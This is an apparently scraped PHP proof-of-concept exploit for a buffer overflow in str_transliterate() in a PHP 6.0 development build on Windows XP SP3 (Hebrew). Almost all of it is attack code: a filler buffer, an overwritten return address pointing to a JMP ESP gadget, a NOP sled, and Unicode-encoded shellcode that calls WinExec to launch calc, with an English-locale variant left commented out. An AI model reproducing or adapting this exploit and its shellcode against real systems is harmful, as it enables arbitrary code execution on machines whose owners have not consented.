47 lines
No EOL
1.6 KiB
PHP
47 lines
No EOL
1.6 KiB
PHP
<?php
|
|
error_reporting(0);
|
|
#####################################################################
|
|
## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
|
|
## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
|
|
## Buffer Overflow
|
|
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
|
|
## Exploited by TheLeader, Debug
|
|
## SP. Thanks: HDM
|
|
## http://www.nullbyte.org.il
|
|
#####################################################################
|
|
## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
|
|
## Take a look, 'unicode.semantics' has to be on!
|
|
## php.ini > unicode.semantics = on
|
|
#####################################################################
|
|
if(ini_get_bool('unicode.semantics')) {
|
|
$buff = str_repeat("\u4141", 256);
|
|
$eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
|
|
$nops = str_repeat("\u9090", 20);
|
|
|
|
# WinExec Calc XP SP3 HEB Unicode-encoded shellcode
|
|
$shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u250D\u7C86\uD3FF\u6163\u636C\u414E";
|
|
|
|
# WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts)
|
|
# $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u23AD\u7C86\uD3FF\u6163\u636C\u414E";
|
|
|
|
$exploit = $buff.$eip.$nops.$shellcode;
|
|
str_transliterate(0, $exploit, 0);
|
|
} else {
|
|
exit("Error! 'unicode.semantics' has be on!\r\n");
|
|
}
|
|
|
|
function ini_get_bool($a) {
|
|
$b = ini_get($a);
|
|
switch (strtolower($b)) {
|
|
case 'on':
|
|
case 'yes':
|
|
case 'true':
|
|
return 'assert.active' !== $a;
|
|
case 'stdout':
|
|
case 'stderr':
|
|
return 'display_errors' === $a;
|
|
default:
|
|
return (bool) (int) $b;
|
|
}
|
|
}
|
|
?>
|